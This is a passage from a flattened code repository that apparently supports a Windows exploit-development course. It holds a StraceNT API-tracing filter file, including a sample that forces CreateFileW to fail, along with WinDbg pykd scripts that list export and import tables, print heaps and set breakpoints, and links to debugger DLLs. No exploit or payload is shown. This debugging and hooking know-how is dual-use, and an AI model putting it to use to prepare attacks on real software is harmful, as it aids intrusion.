module (or dll) for tracing or even chose 11 | # their individual functions for tracing 12 | # 13 | # In the filters, you can specify an absolute name like name of a 14 | # function or dll (eg EnterCriticalSection or kernel32.dll or 15 | # user32.dll) or you can specify * which means all 16 | # 17 | # Rules of prcedence 18 | # 19 | # An absolute name takes precedence over a pattern. If you 20 | # specify EnterCriticalSection in includes and Enter* in excludes 21 | # then EnterCriticalSection would be included but all other functions 22 | # which start with Enter would be excluded. Similarly if you specify 23 | # Load* in includes and LoadLibraryExA in excludes, then all the 24 | # functions would be included for tracing except LoadLibraryExA 25 | # 26 | # This prcedence rule is designed to give a user finer control on 27 | # inclusion/exclusion of functions for tracing 28 | # 29 | # If same absolute name or pattern is specified in both INCLUDES and 30 | # EXCLUDES then INCLUDES takes preference over EXCLUDES. 31 | # 32 | # By default everything is included. You need to specify EXCLUDES 33 | # to exclude particular modules from tracing 34 | # 35 | #-- 36 | 37 | 38 | #################################################################### 39 | # Calling modules, Owner modules and Imported functions # 40 | #################################################################### 41 | # # 42 | # The diagram below shows how the modules are loaded and the # 43 | # relationship between calling module, owner module and function # 44 | # name The sample process is wordpad.exe. # 45 | # # 46 | # Calling/Loaded Owner/Imported Imported Functions # 47 | # Module Module # 48 | # ------------- --------------- ------------------ # 49 | # wordpad.exe # 50 | # |- gdi32.dll (fgA, fgB, ...) # 51 | # |- kernel32.dll (fkA, fkB, ...) # 52 | # gdi32.dll # 53 | # |- kernel32.dll (fkA, fkX, fkY, ...) # 54 | # kernel32.dll # 55 | # |- ntdll.dll (fnA, fnB, ...) # 56 | # ntdll.dll # 57 | # |- (No imports - Ntdll doesn't import anything) # 58 | # # 59 | # In the above example: # 60 | # - wordpad.exe uses functions from kernel32.dll and gdi32.dll # 61 | # - gdi32.dll also imports function from kernel32.dll # 62 | # - kernel32.dll imports functions from ntdll.dll # 63 | # - ntdll.dll doesn't import any functions so it is not dependent # 64 | # on any other module # 65 | # # 66 | # StraceNT gives you fine control on which functions to trace when # 67 | # called by which module. For example if you want to trace all # 68 | # calls to CreateFileW made by notepad.exe, you can put an include # 69 | # filter as, .:kernel32.dll:CreateFileW, If you wish to trace all # 70 | # calls to CreateFileW from all modules, you can do # 71 | # *:kernel32.dll:CreateFileW # 72 | # # 73 | #################################################################### 74 | 75 | 76 | #################################################################### 77 | # INCLUDES and EXCLUDES FORMAT SPECIFICATION # 78 | #################################################################### 79 | # # 80 | # Calling_Module:Owning_Module:Imported_Function # 81 | # # 82 | # Use . for Calling Module to indicate the main program executable # 83 | # Use * for Calling Module to indicate any calling module # 84 | # # 85 | # Use * for Owning Module to trace all the owning modules. For # 86 | # example, something like .:*:* will trace all calls from all the # 87 | # DLLs made by wordpad.exe (if we are tracing wordpad.exe) # 88 | # # 89 | # Use * for Imported Functions to trace all the functions imported # 90 | # from the corressponding owning module # 91 | # # 92 | # NOTE: Put each INCLUDE/EXCLUDE entry at a seperate line # 93 | # # 94 | #################################################################### 95 | 96 | 97 | #################################################################### 98 | # SAMPLE FOR INCLUDES/EXCLUDES FILTER # 99 | #################################################################### 100 | # # 101 | # The sample below uses notepad.exe as an example. It specify inc- # 102 | # -ludes and excludes a way such that EnterCriticalSection when c- # 103 | # -alled by notepad.exe is traced and all the functions of user32- # 104 | # -.dll are traced when called by notepad.exe. If any other module # 105 | # like user32.dll or gdi32.dll calls EnterCriticalSection, they r # 106 | # not traced # 107 | # # 108 | #################################################################### 109 | 110 | 111 | # Trace EnterCriticialSection calls if called directly by notepad.exe 112 | INCLUDES=.:kernel32.dll:EnterCriticalSection 113 | 114 | 115 | # Trace ReadProcessMemory calls if called from gdi32.dll 116 | INCLUDES=gdi32.dll:kernel32.dll:ReadProcessMemory 117 | 118 | 119 | # Trace CreateFileW calls from all the modules 120 | INCLUDES=*:kernel32.dll:CreateFileW 121 | 122 | 123 | # Trace CreateFileW calls from the main process exe but return -1 if 124 | # it is called from main process executable 125 | # To test this run straceNt -f stfilter.txt notepad.exe and you will see 126 | # that notepad is unable to open any file because we return -1 which 127 | # is INVALID_HANDLE_VALUE from CreateFileW 128 | INCLUDES=*:kernel32.dll:CreateFileW=-1 129 | 130 | 131 | # Exclude everything except what is specified in INCLUDES 132 | EXCLUDES=*:*:* 133 | 134 | -------------------------------------------------------------------------------- /11_tools/stracent-x86/stracent.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/stracent-x86/stracent.exe -------------------------------------------------------------------------------- /11_tools/stracent-x86/straceui.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/stracent-x86/straceui.exe -------------------------------------------------------------------------------- /11_tools/windbg_pykd/01_load_pykd_pyd.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/01_load_pykd_pyd.png -------------------------------------------------------------------------------- /11_tools/windbg_pykd/02_pykd_iat_py.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/02_pykd_iat_py.png -------------------------------------------------------------------------------- /11_tools/windbg_pykd/SampleBreakPoint.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/SampleBreakPoint.py -------------------------------------------------------------------------------- /11_tools/windbg_pykd/expOneShotBreak.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/expOneShotBreak.py -------------------------------------------------------------------------------- /11_tools/windbg_pykd/export.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import fnmatch 3 | from pykd import * 4 | 5 | 6 | def export( moduleName, mask = "*" ): 7 | 8 | modObj = module( moduleName ) 9 | dprintln( "Module: " + moduleName + " base: %x" % modObj.begin() + " end: %x" % modObj.end() ) 10 | 11 | if isKernelDebugging(): 12 | systemModule = module( "nt" ) 13 | else: 14 | systemModule = module( "ntdll" ) 15 | 16 | 17 | if is64bitSystem(): 18 | ntHeader = systemModule.typedVar( "_IMAGE_NT_HEADERS64", modObj.begin() + ptrDWord( modObj.begin() + 0x3c ) ) 19 | if ntHeader.OptionalHeader.Magic == 0x10b: 20 | systemModule = module( "ntdll32" ) 21 | ntHeader = systemModule.typedVar( "_IMAGE_NT_HEADERS", modObj.begin() + ptrDWord( modObj.begin() + 0x3c ) ) 22 | 23 | else: 24 | ntHeader = systemModule.typedVar("_IMAGE_NT_HEADERS", modObj.begin() + ptrDWord( modObj.begin() + 0x3c ) ) 25 | 26 | 27 | dprintln( "Export RVA: %x Size: %x" % ( ntHeader.OptionalHeader.DataDirectory[0].VirtualAddress, ntHeader.OptionalHeader.DataDirectory[0].Size ) ) 28 | dprintln( "========================" ) 29 | 30 | if ntHeader.OptionalHeader.DataDirectory[0].Size == 0: 31 | return 32 | 33 | exportDirAddr = modObj.begin() + ntHeader.OptionalHeader.DataDirectory[0].VirtualAddress; 34 | 35 | namesCount = ptrDWord( exportDirAddr + 0x18 ) 36 | 37 | namesRva = modObj.begin() + ptrDWord( exportDirAddr + 0x20 ) 38 | ordRva = modObj.begin() + ptrDWord( exportDirAddr + 0x24) 39 | addrRva = modObj.begin() + ptrDWord( exportDirAddr + 0x1c) 40 | 41 | for i in range( 0, namesCount ): 42 | 43 | exportName = loadCStr( modObj.begin() + ptrDWord( namesRva + 4 * i ) ) 44 | if fnmatch.fnmatch( exportName, mask ): 45 | ord = ptrWord(ordRva + i * 2) 46 | func = modObj.begin() + ptrDWord(addrRva + ord * 4) 47 | 48 | dprintln("{0:x}\t{1}".format(func, exportName)) 49 | 50 | 51 | if __name__ == "__main__": 52 | 53 | if not isWindbgExt(): 54 | print "script is launch out of windbg" 55 | quit( 0 ) 56 | 57 | if len (sys.argv)<=1: 58 | dprintln( "usage: !py export module_name ( export mask )" ) 59 | elif len( sys.argv ) == 2: 60 | export( sys.argv[1] ) 61 | else: 62 | export( sys.argv[1], sys.argv[2] ) 63 | -------------------------------------------------------------------------------- /11_tools/windbg_pykd/iat.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import fnmatch 3 | from pykd import * 4 | 5 | 6 | def iat( moduleName, mask = "*" ): 7 | 8 | mod = module( moduleName ) 9 | dprintln( "Module: " + moduleName + " base: %x" % mod.begin() + " end: %x" % mod.end() ) 10 | 11 | if isKernelDebugging(): 12 | systemModule = module( "nt" ) 13 | else: 14 | systemModule = module( "ntdll" ) 15 | 16 | 17 | if is64bitSystem(): 18 | ntHeader = systemModule.typedVar( "_IMAGE_NT_HEADERS64", mod.begin() + ptrDWord( mod.begin() + 0x3c ) ) 19 | if ntHeader.OptionalHeader.Magic == 0x10b: 20 | systemModule = loadModule( "ntdll32" ) 21 | ntHeader = systemModule.typedVar( "_IMAGE_NT_HEADERS", mod.begin() + ptrDWord( mod.begin() + 0x3c ) ) 22 | pSize = 4 23 | else: 24 | pSize = 8 25 | else: 26 | ntHeader = systemModule.typedVar( "_IMAGE_NT_HEADERS", mod.begin() + ptrDWord( mod.begin() + 0x3c ) ) 27 | pSize = 4 28 | 29 | 30 | dprintln( "IAT RVA: %x Size: %x" % ( ntHeader.OptionalHeader.DataDirectory[12].VirtualAddress, ntHeader.OptionalHeader.DataDirectory[12].Size ) ) 31 | dprintln( "========================" ) 32 | 33 | if ntHeader.OptionalHeader.DataDirectory[12].Size == 0: 34 | return 35 | 36 | iatAddr = mod.begin() + ntHeader.OptionalHeader.DataDirectory[12].VirtualAddress; 37 | 38 | for i in range( 0, ntHeader.OptionalHeader.DataDirectory[12].Size / pSize ): 39 | 40 | if ( pSize == 4 ): 41 | iatEntry = addr64(ptrDWord( iatAddr + i*pSize )) 42 | else: 43 | iatEntry = addr64(ptrQWord( iatAddr + i*pSize )) 44 | 45 | if iatEntry != None and iatEntry != 0: 46 | symbolName = findSymbol( iatEntry ) 47 | if fnmatch.fnmatch( symbolName, mask ): 48 | dprintln( "{0:x}\t{1}".format(iatEntry, symbolName) ) 49 | 50 | 51 | if __name__ == "__main__": 52 | 53 | if not isWindbgExt(): 54 | print "script is launch out of windbg" 55 | quit( 0 ) 56 | 57 | if len (sys.argv)<=1: 58 | dprintln( "usage: !py import module_name ( symbol name mask )" ) 59 | elif len( sys.argv ) == 2: 60 | iat( sys.argv[1] ) 61 | else: 62 | iat( sys.argv[1], sys.argv[2] ) 63 | 64 | -------------------------------------------------------------------------------- /11_tools/windbg_pykd/iatOneShotBreak.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/iatOneShotBreak.py -------------------------------------------------------------------------------- /11_tools/windbg_pykd/printHeap.py: -------------------------------------------------------------------------------- 1 | import sys 2 | from pykd import * 3 | 4 | print("printHeap.py") 5 | str = dbgCommand("!address") 6 | ary = str.split("\n") 7 | print(ary[0]) 8 | print(ary[1]) 9 | print(ary[2]) 10 | for i in range(3, len(ary)): 11 | if ary[i].find("Heap") >= 0: 12 | print(ary[i]) 13 | -------------------------------------------------------------------------------- /11_tools/windbg_pykd/python2.7.11は使用不可.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/python2.7.11は使用不可.txt -------------------------------------------------------------------------------- /11_tools/windbg_pykd/setBP.py: -------------------------------------------------------------------------------- 1 | import sys 2 | from pykd import * 3 | 4 | 5 | if len (sys.argv)<=1: 6 | dprintln( "usage: !py setBP address(or function name)" ) 7 | elif len( sys.argv ) == 2: 8 | print("setBP.py") 9 | #cmd = "bp {0} \".printf \\\"---------------------------------------------------------------------------\\\\n\\\";r;dda esp;k;g\"".format(sys.argv[1]) 10 | cmd = "bp {0} \".printf \\\"---------------------------------------------------------------------------\\\\n\\\";r;dda poi(esp + 8);g\"".format(sys.argv[1]) 11 | print(cmd) 12 | dbgCommand(cmd) 13 | -------------------------------------------------------------------------------- /11_tools/windbg_pykd/setFuncBP.py: -------------------------------------------------------------------------------- 1 | import sys 2 | from pykd import * 3 | 4 | 5 | if len (sys.argv)<=1: 6 | dprintln( "usage: !py setBP address(or function name)" ) 7 | elif len( sys.argv ) == 2: 8 | print("setBP.py") 9 | cmd = "bp {0} \".printf \\\"---------------------------------------------------------------------------\\\\n\\\";r;dda esp;k;g\"".format(sys.argv[1]) 10 | print(cmd) 11 | dbgCommand(cmd) 12 | -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/LogManifest.lgm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/LogManifest.lgm -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/Logexts.ini: -------------------------------------------------------------------------------- 1 | [Logging] 2 | ;This is the only setting we don't do a default. 3 | ; in shim mode, it defaults to on 4 | ; in debugger extension mode, it defaults to on but loge/logd can toggle even pre injection 5 | ;If you enable this ini setting, it will override the above rules 6 | ;InitialStateON=1 7 | UseManifest=1 8 | Engine=Default 9 | LogStdCall=1 10 | LogComCall=1 11 | LogUnknownApis=1 12 | LogExceptions=1 13 | UnknownApisParameterCount=4 14 | LogSystemCalls=1 15 | LogMainExecutable=1 16 | PropagateToChildProcesses=1 17 | DeleteEmptyLogOnExit=1 18 | ExcludedExes=cmd.exe;logviewer.exe;log.exe;xcopy.exe;TrustedInstaller.exe;lsass.exe;services.exe;sidebar.exe;dwm.exe;SearchIndexer.exe;lsm.exe;spoolsv.exe;taskeng.exe 19 | ExcludedDlls=isrt.dll 20 | BadIATDlls=issetup.dll 21 | Performance=1 22 | FullPointerVerification=1 23 | ExcludedAPIs=GetCurrentThread;GetCurrentProcess;GetCurrentThreadId;GetCurrentProcessId 24 | ExtraSystemFiles=comctl32.dll;gdiplus.dll;msvcr80.dll 25 | ; ~DebuggerPath~ gets replaced with where logexts.dll is minus the winext/logx32 26 | ; ~Pid~ gets replaced with the decimal pid of the server process 27 | ComServersDebugger=~DebuggerPath~\logger.exe -c -g -G -tt -tl -td -p ~Pid~ 28 | 29 | [Paths] 30 | ;By default, the manifest path is same as where logexts.dll is loaded from, 31 | ;except if syswow64 is in the path (it is then replaced to system32: the 32 | ;logmanifest.lgm file is architecture size and processor type agnostic) 33 | ;Manifest=%windir%\system32\LogManifest.lgm 34 | Logs=%userprofile%\Desktop\ApiLogs 35 | SymFiles=%userprofile%\Desktop\ApiLogs 36 | -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/bthkd.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/bthkd.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/dbgeng.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/dbgeng.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/dbghelp.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/dbghelp.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/ext.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/ext.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/gpiokd.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/gpiokd.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/hidkd.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/hidkd.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/jscript9diagdump.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/jscript9diagdump.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/kext.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/kext.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/logexts.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/logexts.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/msdia120.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/msdia120.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/pykd.pyd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/pykd.pyd -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/rcdrkd.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/rcdrkd.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/srcsrv.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/srcsrv.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/storagekd.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/storagekd.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/symsrv.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/symsrv.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/uext.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/uext.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/usb3kd.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/usb3kd.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/usbkd.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/usbkd.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/wdfkd.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/wdfkd.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/本ファイルの配置場所.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/本ファイルの配置場所.png -------------------------------------------------------------------------------- /11_tools/windbg_pykd/ブレークポイント例.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/ブレークポイント例.txt -------------------------------------------------------------------------------- /12_syscall/printf_syscall_x64/01_NtWriteFile_x64_sysenter.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/12_syscall/printf_syscall_x64/01_NtWriteFile_x64_sysenter.png -------------------------------------------------------------------------------- /12_syscall/printf_syscall_x64/02_NtWriteFile_x64_sysenter.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/12_syscall/printf_syscall_x64/02_NtWriteFile_x64_sysenter.png -------------------------------------------------------------------------------- /13_MinGw_リンカオプション/mingw_gcc_コンパイル_リンク.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/13_MinGw_リンカオプション/mingw_gcc_コンパイル_リンク.png -------------------------------------------------------------------------------- /14_VC_リンカオプション/TinyWebコンパイルオプション.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/14_VC_リンカオプション/TinyWebコンパイルオプション.JPG -------------------------------------------------------------------------------- /14_VC_リンカオプション/TinyWebリンカオプション.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/14_VC_リンカオプション/TinyWebリンカオプション.JPG --------------------------------------------------------------------------------